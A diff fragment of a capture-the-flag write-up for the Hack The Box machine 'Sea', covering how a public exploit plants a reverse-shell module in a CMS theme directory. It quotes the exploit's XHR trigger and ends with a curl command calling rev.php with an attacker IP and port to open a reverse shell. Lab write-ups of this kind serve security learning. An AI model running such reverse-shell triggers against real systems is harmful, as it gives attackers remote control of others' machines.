e1kfL0ck/writeups/HTB/Sea/README.md

   except: print(data,"\n","//write this to a file")
 ```

 I tried it but it does not work.
 Let's analyse it to understand how it works.
 It seems like the above code install a module called RevShell and save it to `themes/revshell-main/rev.php`.
+(By resetting the machine, you will find that the reverse shell is already present.
+Is this an error ?)
 And then execute it : `xhr5.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php?lhost=" + ip + "&lport=" + port);`

-Okay.
-Let's try something like :
+Anyway.
+Let's try to trigger the shell with something like :

 ```bash
 curl http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.16.61+&lport=1234